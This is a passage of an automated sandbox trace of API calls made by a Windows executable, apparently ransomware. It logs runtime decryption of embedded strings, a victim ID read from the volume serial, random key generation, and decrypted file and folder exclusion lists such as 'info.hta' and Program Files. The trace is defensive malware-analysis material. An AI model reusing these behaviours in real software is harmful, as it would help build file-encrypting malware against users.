1 [0039.137] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.137] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714c0 | out: hHeap=0x870000) returned 1 [0039.137] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0039.137] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x41fbac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x41fbac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.138] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x870000) returned 1 [0039.138] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x28) returned 0x871470 [0039.138] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8714a0 [0039.138] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa7c | out: phKey=0x41fa7c*=0x224ba8) returned 1 [0039.138] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa64, dwFlags=0x0) returned 1 [0039.138] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714a0, pdwDataLen=0x41fa30 | out: pbData=0x8714a0, pdwDataLen=0x41fa30) returned 1 [0039.138] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.138] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8714b8 [0039.138] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa74 | out: phKey=0x41fa74*=0x224ba8) returned 1 [0039.138] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa5c, dwFlags=0x0) returned 1 [0039.138] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714b8, pdwDataLen=0x41fa28 | out: pbData=0x8714b8, pdwDataLen=0x41fa28) returned 1 [0039.138] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.138] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8714d0 [0039.138] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa6c | out: phKey=0x41fa6c*=0x224ba8) returned 1 [0039.138] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa54, dwFlags=0x0) returned 1 [0039.139] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714d0, pdwDataLen=0x41fa20 | out: pbData=0x8714d0, pdwDataLen=0x41fa20) returned 1 [0039.139] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.139] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8714e8 [0039.139] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa64 | out: phKey=0x41fa64*=0x224ba8) returned 1 [0039.139] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa4c, dwFlags=0x0) returned 1 [0039.139] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714e8, pdwDataLen=0x41fa18 | out: pbData=0x8714e8, pdwDataLen=0x41fa18) returned 1 [0039.139] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.139] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x871500 [0039.139] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9f4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa5c | out: phKey=0x41fa5c*=0x224ba8) returned 1 [0039.139] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa44, dwFlags=0x0) returned 1 [0039.139] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871500, pdwDataLen=0x41fa10 | out: pbData=0x871500, pdwDataLen=0x41fa10) returned 1 [0039.139] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.139] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x871598 [0039.139] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa54 | out: phKey=0x41fa54*=0x224ba8) returned 1 [0039.139] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa3c, dwFlags=0x0) returned 1 [0039.139] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871598, pdwDataLen=0x41fa08 | out: pbData=0x871598, pdwDataLen=0x41fa08) returned 1 [0039.139] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.139] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x70) returned 0x8715b0 [0039.140] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa4c | out: phKey=0x41fa4c*=0x224ba8) returned 1 [0039.140] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fa34, dwFlags=0x0) returned 1 [0039.140] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8715b0, pdwDataLen=0x41fa00 | out: pbData=0x8715b0, pdwDataLen=0x41fa00) returned 1 [0039.140] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.140] htonl (hostlong=0x9c354b42) returned 0x424b359c [0039.140] CryptGenRandom (in: hProv=0x224fe0, dwLen=0x20, pbBuffer=0x41fb40 | out: pbBuffer=0x41fb40) returned 1 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x28) returned 0x871628 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x871658 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x871670 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x14) returned 0x871680 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8716a0 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x8716b8 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x871740 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x875480 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x875510 [0039.140] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x871758 [0039.140] CryptAcquireContextW (in: phProv=0x124fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x124fcf4*=0x23a100) returned 1 [0039.142] CryptGenRandom (in: hProv=0x23a100, dwLen=0x55, pbBuffer=0x41faaa | out: pbBuffer=0x41faaa) returned 1 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x875528 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x875540 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8755c8 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x2) returned 0x8755e0 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x8755f0 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x875600 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x875618 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x8756a0 [0039.142] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x8756b8 [0039.142] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8755e0, Size=0x82) returned 0x8756c8 [0039.142] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8756b8, Size=0x100) returned 0x875758 [0039.143] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x875860 [0039.143] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x746b90 [0039.144] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c20 [0039.144] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x746c38 [0039.144] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8756c8, Size=0x104) returned 0x746cc8 [0039.144] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x746b90, Size=0x104) returned 0x746dd8 [0039.144] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8716b8, Size=0x100) returned 0x746ee8 [0039.144] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x875758, Size=0x200) returned 0x746ff0 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8755f0 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746ff0 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875540 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875528 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875618 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875600 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746cc8 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8755c8 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746dd8 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875860 | out: hHeap=0x870000) returned 1 [0039.145] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c38 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746c20 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871670 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871658 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875480 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871740 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x746ee8 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716a0 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871758 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875510 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871628 | out: hHeap=0x870000) returned 1 [0039.146] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871680 | out: hHeap=0x870000) returned 1 [0039.146] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xa4) returned 0x871628 [0039.146] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x62) returned 0x8716d8 [0039.146] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8716d8, Size=0xc2) returned 0x875480 [0039.146] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746ba8 [0039.146] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xb40) returned 0x747390 [0039.146] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa44 | out: phKey=0x41fa44*=0x23a350) returned 1 [0039.146] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa2c, dwFlags=0x0) returned 1 [0039.147] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x747390, pdwDataLen=0x41f9f8 | out: pbData=0x747390, pdwDataLen=0x41f9f8) returned 1 [0039.147] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.147] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746bc0 [0039.147] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa3c | out: phKey=0x41fa3c*=0x23a350) returned 1 [0039.147] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa24, dwFlags=0x0) returned 1 [0039.147] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746bc0, pdwDataLen=0x41f9f0 | out: pbData=0x746bc0, pdwDataLen=0x41f9f0) returned 1 [0039.147] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.147] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x747ed8 [0039.147] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa14 | out: phKey=0x41fa14*=0x23a350) returned 1 [0039.147] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9fc, dwFlags=0x0) returned 1 [0039.147] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x747ed8, pdwDataLen=0x41f9c8 | out: pbData=0x747ed8, pdwDataLen=0x41f9c8) returned 1 [0039.147] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.147] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x84) returned 0x8716d8 [0039.147] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x84) returned 0x8795b0 [0039.148] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875550 [0039.148] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f984, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41f9ec | out: phKey=0x41f9ec*=0x23a350) returned 1 [0039.148] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9d4, dwFlags=0x0) returned 1 [0039.148] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875550, pdwDataLen=0x41f9a0 | out: pbData=0x875550, pdwDataLen=0x41f9a0) returned 1 [0039.148] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.148] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875550 | out: hHeap=0x870000) returned 1 [0039.148] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x8716d8, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0039.148] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8795b0 | out: hHeap=0x870000) returned 1 [0039.148] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747ed8 | out: hHeap=0x870000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x60) returned 0x747ed8 [0039.148] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa10 | out: phKey=0x41fa10*=0x23a350) returned 1 [0039.149] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9f8, dwFlags=0x0) returned 1 [0039.149] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x747ed8, pdwDataLen=0x41f9c4 | out: pbData=0x747ed8, pdwDataLen=0x41f9c4) returned 1 [0039.149] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.149] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x5c) returned 0x747f40 [0039.149] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x5c) returned 0x875550 [0039.149] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8755b8 [0039.149] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f980, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41f9e8 | out: phKey=0x41f9e8*=0x23a350) returned 1 [0039.149] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41f9d0, dwFlags=0x0) returned 1 [0039.149] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8755b8, pdwDataLen=0x41f99c | out: pbData=0x8755b8, pdwDataLen=0x41f99c) returned 1 [0039.149] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.149] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8755b8 | out: hHeap=0x870000) returned 1 [0039.149] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x747f40, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0039.149] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875550 | out: hHeap=0x870000) returned 1 [0039.149] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747ed8 | out: hHeap=0x870000) returned 1 [0039.149] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875550 [0039.149] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x87b598 [0039.149] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x87b598, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0039.150] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x87b598 | out: hHeap=0x870000) returned 1 [0039.150] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xb38) returned 0x87b598 [0039.150] GetLastError () returned 0x0 [0039.150] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x87b598, Size=0xb46) returned 0x87b598 [0039.150] GetLastError () returned 0x0 [0039.150] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x86) returned 0x8795b0 [0039.150] GetLastError () returned 0x0 [0039.150] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8795b0, Size=0x98) returned 0x875768 [0039.150] GetLastError () returned 0x0 [0039.150] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x5e) returned 0x747ed8 [0039.150] GetLastError () returned 0x0 [0039.151] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fb04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb6c | out: phKey=0x41fb6c*=0x23a350) returned 1 [0039.151] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fb54, dwFlags=0x0) returned 1 [0039.151] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875808, pdwDataLen=0x41fb20 | out: pbData=0x875808, pdwDataLen=0x41fb20) returned 1 [0039.151] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.151] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x875830 [0039.151] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8716d8 [0039.151] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x747f40 [0039.151] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fadc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb44 | out: phKey=0x41fb44*=0x23a350) returned 1 [0039.151] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fb2c, dwFlags=0x0) returned 1 [0039.151] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x747f40, pdwDataLen=0x41faf8 | out: pbData=0x747f40, pdwDataLen=0x41faf8) returned 1 [0039.151] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.151] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747f40 | out: hHeap=0x870000) returned 1 [0039.151] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x875830, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.151] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0039.152] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875808 | out: hHeap=0x870000) returned 1 [0039.152] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x41fbac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x41fbac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.152] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875830 | out: hHeap=0x870000) returned 1 [0039.152] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x28) returned 0x875808 [0039.152] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746bc0 [0039.152] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa7c | out: phKey=0x41fa7c*=0x23a350) returned 1 [0039.152] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa64, dwFlags=0x0) returned 1 [0039.152] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746bc0, pdwDataLen=0x41fa30 | out: pbData=0x746bc0, pdwDataLen=0x41fa30) returned 1 [0039.152] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.152] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746bd8 [0039.152] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa74 | out: phKey=0x41fa74*=0x23a350) returned 1 [0039.153] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa5c, dwFlags=0x0) returned 1 [0039.153] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746bd8, pdwDataLen=0x41fa28 | out: pbData=0x746bd8, pdwDataLen=0x41fa28) returned 1 [0039.153] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.153] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746bf0 [0039.153] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa6c | out: phKey=0x41fa6c*=0x23a350) returned 1 [0039.153] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa54, dwFlags=0x0) returned 1 [0039.153] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746bf0, pdwDataLen=0x41fa20 | out: pbData=0x746bf0, pdwDataLen=0x41fa20) returned 1 [0039.153] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.153] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c08 [0039.153] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa64 | out: phKey=0x41fa64*=0x23a350) returned 1 [0039.153] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa4c, dwFlags=0x0) returned 1 [0039.153] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746c08, pdwDataLen=0x41fa18 | out: pbData=0x746c08, pdwDataLen=0x41fa18) returned 1 [0039.153] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.153] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x747f40 [0039.153] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9f4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa5c | out: phKey=0x41fa5c*=0x23a350) returned 1 [0039.154] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa44, dwFlags=0x0) returned 1 [0039.154] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x747f40, pdwDataLen=0x41fa10 | out: pbData=0x747f40, pdwDataLen=0x41fa10) returned 1 [0039.154] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.154] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c20 [0039.154] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa54 | out: phKey=0x41fa54*=0x23a350) returned 1 [0039.154] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa3c, dwFlags=0x0) returned 1 [0039.154] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x746c20, pdwDataLen=0x41fa08 | out: pbData=0x746c20, pdwDataLen=0x41fa08) returned 1 [0039.154] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.154] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x70) returned 0x8716d8 [0039.154] CryptImportKey (in: hProv=0x224fe0, pbData=0x41f9e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fa4c | out: phKey=0x41fa4c*=0x23a350) returned 1 [0039.154] CryptSetKeyParam (hKey=0x23a350, dwParam=0x1, pbData=0x41fa34, dwFlags=0x0) returned 1 [0039.154] CryptDecrypt (in: hKey=0x23a350, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0x41fa00 | out: pbData=0x8716d8, pdwDataLen=0x41fa00) returned 1 [0039.154] CryptDestroyKey (hKey=0x23a350) returned 1 [0039.154] htonl (hostlong=0x9c354b42) returned 0x424b359c [0039.154] CryptGenRandom (in: hProv=0x224fe0, dwLen=0x20, pbBuffer=0x41fb40 | out: pbBuffer=0x41fb40) returned 1 [0039.154] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x28) returned 0x875838 [0039.154] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c38 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4) returned 0x875868 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x14) returned 0x8714a0 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c50 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x80) returned 0x8714c0 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c68 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x82) returned 0x8795b0 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10) returned 0x746c80 [0039.155] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, 